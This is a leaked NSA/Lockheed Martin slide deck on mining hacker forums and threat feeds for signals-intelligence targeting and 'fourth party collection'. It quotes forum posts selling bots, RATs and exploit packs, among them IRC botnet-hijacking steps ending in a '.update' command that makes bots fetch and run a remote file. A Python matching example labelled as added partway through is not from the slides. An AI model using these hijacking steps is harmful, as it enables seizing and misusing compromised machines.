Title: OSINT Fusion Project
Release Date: 2015-07-01
Description: This undated presentation from NSA’s UK-based Menwith Hill station describes the various uses of open source intelligence (OSINT) in computer network operations, including the monitoring of hacker forums and spotting opportunities for so-called “Fourth Party Collection”: see the Intercept article XKEYSCORE: NSA’s Google for the World’s Private Communications, 1 July 2015.
Document: TOP SECRET//COMINT//REL TO USA, FVEY
OSINT FUSION PROJECT
Lockheed Martin IS&GS Intelligence
LOCKHEED MARTIN
Traditional OSINT
• Traditional OSINT is mostly from mainstream news, compiled summaries, and information put out by vendors.
- Good for situational awareness
- Some excellent analysis on attacks and exploits
- Information can be days or weeks old
- Doesn't normally contain strong selectors
Research Objectives
• To compile OSINT information that enables CNO operations & analysis
- Emerging threats
- Situational awareness
- Identification of the following:
• Victims
• Adversaries
• Capabilities
• Infrastructure
Research Objectives
• To identify strong selectors and unique strings from OSINT that can be used within SIGINT:
- To build XKEYSCORE fingerprints to identify an adversary's capabilities being used within SIGINT collection
- To identify and task adversaries and their infrastructure within SIGINT
- To identify victims for 4th Party Collection opportunities
Hacker Forums
• A clever way to collect OSINT information from Hacker Forums
- RSS Feeds
• Automated collection of new and historical posts
• Allows quicker analysis of posts
• Leaves no tracks on the forum, unlike AIRGAP
• If enabled, can also get feeds from closed (login required) forums
• Enables analysts to prioritize other sites without RSS feeds for other access operations
Hacker Forums
• Allows for the identification of:
- Adversaries
• Those who are building capabilities
• Those who are selling capabilities
• Those who are using the capabilities
• Those who are selling information (Cyber Crime)
- Capabilities
• Profiling and understanding of emerging tactics, techniques, and procedures used by our adversaries
• Identification of locations where capabilities can be obtained
Hacker Forums
BlackEnergy DDoS Bot
by kmv9Q0
nuclear stealth mechanisms fludery support multitargeting and multirezolving - if the purpose for the attack indicates the domain name is created by a group of flows to attack each IP-address attached to this domain (rezolving repeated every 15 minutes)
[RAT] Slayer616's RAT 1.2 Final
by slayer616
Hey Guys,
I completed the first Final Build. After some hard work I fixed like 20 little bugs and added Keylogging Function + Better GUI + Flag System!
Screenshot:
[Screenshot of the RAT control panel, titled "Slayer616's Reverse Administrator - Listening on Port: 1234"]
Bundles exploit [yes Exploit System]
by Saint
Welcome forumchan!
Sell sploitov ligament.
Test mix, iframe traffic:
Your browser version probiva Percent
Internet Explorer 5.0 - 50-75%
Internet Explorer 5.1 - 50-75%
Internet Explorer 5.5 - 80-90%
Internet Explorer 6.0 - 35-59%
Internet Explorer 7.0 - 10-15%
Internet Explorer 6.0 - 5-10%
Opera 9.0-9.25 - 75-80%
Opera 9.5x-9.6x - 10-15%
Opera 10.0 - 8-10%
FireFox 1.X - 15-20%
FireFox 2.X - 10-15%
FireFox 3.X - 10%
Mozilla 5.x - 5-8%
Create a Zip Bomb - Zip of Death
Posted by X.E.R.O
A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or render useless the program or system reading it. It is often used by virus writers to disable antivirus software, so that a more traditional virus sent afterwards could get into the system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for ease of transport and to avoid suspicion. However, when the file is unpacked its contents are more than the system can handle. You can make your own zip bomb to annoy your friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don't detonate it on yourself.
Hacker Forums
[Screenshot of an automated heuristics analysis report: the host name m.DRD3H.COM was requested from a host database; an outbound connection (potentially malicious) to m.DRD3H.COM on port 6668 was attempted, followed by a new IRC connection (USER/HOST lines shown). A forum post is overlaid, reading in part: "/server yourserver ... in your IRC client ... Make your nick similar ... there's the channel and ..."]
Hacker Forums
You need to be operator to set the topic. Default password is /oper foo bar; but if they have changed it, DDoS attack it with your bots and make sure that you are the first to join!
If you happen to get into a channel with a ton of bots, and the op isn't there, change your nick to a bot's name, or similar, and wait.
They should type like .login
that's when you do the same! haha.
type .login
then .update http://www.somehost.com/yourfile.exe
Malicious Emails
• Leverage OSINT to identify the infrastructure and source of top virus email senders by IP address
- Based on Cisco IronPort's view of 25-30% of the world's email
- Identifies infrastructure used by adversaries to deliver capability
- Allows SIGINT profiling of activity on the IP
Malicious Emails
Top virus senders by IP address for the last day, 10 MAY 2009
IP Address | Hostname | FWD / Rev DNS | Volume | Vol change vs. Avg | Network Owner
[Table of 16 sender rows (IP address, hostname, DNS match, volume, change vs. average, network owner) not reproduced]
Malicious Connections
• An effort to identify the latest emerging threats that are not yet detected by anti-virus or IDS/IPS signatures
- Malicious Binary MD5 (track capability)
- The adversaries' infrastructure that exploited systems connect to after being compromised
- Traffic generated by compromised systems to build XKEYSCORE fingerprints
Malicious Connections
18 MAY 2009
The following "call home" IPs/Domains should be considered malicious and connectivity to them should be investigated. Systems initiating a connection with these IPs/Domains should be treated as compromised until reviewed. POC:
File ME) 5 : OxAlBFF64FE8CB692A8F1F1DDFE7 6510 7F
File SIIA-X: OxlDEC6Bl 8SD45 6EBB3F6 2 9E5C2 4 4 0C10BF2 8DC6 9 0
Filesize: 108,032 bytes
Category: A malicious trojan horse or bot that may represent a security risk for the compromised system and/or its network environment
The following Host Name was requested from a host database:
- hf.burimche.net
There was a registered attempt to establish connection with the remote host. The connection details are:
Remote Host        Port Number
hf.burimche.net    4244
There was a new connection established with a remote IRC Server. The generated outbound IRC traffic is provided below:
PASS bf NICK [00[USA|030685] UStiR XP — 0 4 4 2 * O : COMPUTERMAMR
Malicious Connections
• NTOC - Signatures for Sensors
- BLUESASH
- TUTELAGE (TURBULENCE Defensive)
- CROSSBONES
• NSA TAO / GCHQ CNE - Counter CNE Ops
• MHS / NDIST - 4th Party Collection
• JCMA Cyber - Customer focused CND
• GOVCERT UK - UK Government CND
Malicious Connections
• (U//FOUO) The following statistics show the number of NTOC DNS Alerts that were an exact match for a malicious connection reported in the MHS CNO Malicious Connections Report.

Date      Total DNS Alerts   Exact MCR Match   Percentage
5/14/09    22                 13                 59%
5/13/09    23                 11                 47%
5/12/09    23                 10                 43%
5/11/09    21                 11                 52%
5/10/09    51                 44                 86%
5/09/09    12                  8                 67%
5/08/09    52                 44                 85%
5/07/09    84                 75                 89%
5/06/09    20                 14                 70%
5/04/09   107                 66                 62%
5/03/09     1                  1                100%
5/01/09    77                 74                 96%
4/30/09    82                 71                 87%
4/29/09    80                 73                 91%
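As an added example (not code from the slides or from the project), the matching behind the statistics above and the report excerpt on the previous slide: parse the call-home hosts out of an MCR-style report, exact-match NTOC-style DNS alerts against them, and compute the match percentage. The report and alert line formats, host names and client IPs are constructed assumptions modelled on the slide.

```python
# Added example (not from the slides): exact-match DNS alerts against the
# call-home hosts of a Malicious Connections Report (MCR), the statistic the
# slide tabulates. Report and alert formats are assumptions modelled on it.
import re

# Constructed MCR excerpt; hosts are placeholders, not real indicators.
MCR_TEXT = """\
File MD5: 0xAABBCCDD00112233445566778899EEFF
Remote Host: callhome.example.invalid Port: 4244
Remote Host: update.example.invalid Port: 6668
"""

# Constructed DNS alert lines: <timestamp> <client ip> <queried name>
DNS_ALERTS = """\
2009-05-14T08:01:02Z 10.1.2.3 callhome.example.invalid
2009-05-14T08:02:11Z 10.1.2.4 benign.example.invalid
2009-05-14T08:03:45Z 10.1.2.3 sub.callhome.example.invalid.
2009-05-14T09:10:00Z 10.1.2.9 UPDATE.example.invalid
"""

MCR_HOST_RE = re.compile(r"Remote Host:\s*(\S+)\s+Port:\s*(\d+)")

def parse_mcr(text):
    """Return {call-home host: port} for every remote-host entry in the report."""
    return {h.lower().rstrip("."): int(p) for h, p in MCR_HOST_RE.findall(text)}

def match_alerts(alert_text, indicators):
    """Return (matches, total); matches is a list of (client_ip, host, port).
    Names are normalised (case, trailing dot) but subdomains do not count,
    because the slide's statistic is an *exact* MCR match."""
    matches, total = [], 0
    for line in alert_text.strip().splitlines():
        total += 1
        _ts, client, qname = line.split()
        qname = qname.lower().rstrip(".")
        if qname in indicators:
            matches.append((client, qname, indicators[qname]))
    return matches, total

def exact_match_percentage(matches, total):
    """The 'Percentage' column: exact MCR matches over total DNS alerts."""
    return round(100 * len(matches) / total) if total else 0

if __name__ == "__main__":
    ind = parse_mcr(MCR_TEXT)
    hits, total = match_alerts(DNS_ALERTS, ind)
    for client, host, port in hits:
        print(f"{client} -> {host}:{port}: treat as compromised until reviewed")
    print(f"{len(hits)}/{total} exact MCR matches ({exact_match_percentage(hits, total)}%)")
```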
Malicious Connections
• US/UK/AU Government Email addresses passed to exploit server - 17 email accounts
- Discovered using an MHS developed XKEYSCORE Fingerprint that was written to identify a malicious connection while searching for MENA 4th Party Collection opportunities.
ShadowServer Data
• Sinkhole HTTP Drone Report - All the IP addresses that joined the sinkhole server that did not join via a referral URL. Since the Sinkhole server is only accessed through previously malicious domain names, only infected systems are in the report.
- Victims / Infrastructure / HTTP Command Strings
ShadowServer Data
• Sandbox URL Report - These are URLs that were accessed by malware.
- Binary MD5 Hashes / Infrastructure / HTTP Command Strings
• Botnet Drone Report - All the IP addresses that were seen joining a known Botnet Command and Control Server.
- Victims / Infrastructure
• 25 US Government (Federal / State / Local) systems communicating with botnets between 5-7 June 2009
ShadowServer Data
• Botnet URL Report - Any URL that was seen in a botnet channel is reported. The URL could be an update, complaint, or information related to the criminals. Everything is included in case there is something of value in the URL.
- Infrastructure / Capabilities / HTTP Command Strings
• DDoS Report - Any DDoS attack is reported whether the country is the target or the source of the attack.
- Victims / Infrastructure / Capabilities
State Sponsored
• Example 1 (FBI CN Intrusion Set)
- Identified MALWARE report for known domain.
- Found another binary which was an exact match that revealed a previously unassociated domain to this intrusion set 9 months before first known activity of this intrusion set.
• Infrastructure / Registration / Timeline / MD5 hash
State Sponsored
• Example 2 (JTF-GNO CN Intrusion Set)
- 6 different reports noted the use of a specific Chinese developed standalone web server software package.
- Identified 3 new binaries in OSINT malware research that also used this exact software package.
• 3 new domains (infrastructure / registration / timeline / MD5 hashes)
State Sponsored
• Example 3 (NSA CN Intrusion Set)
- Identified 2 binaries in OSINT that matched those called out in a report with their associated malware analysis and MD5 hashes.
Questions?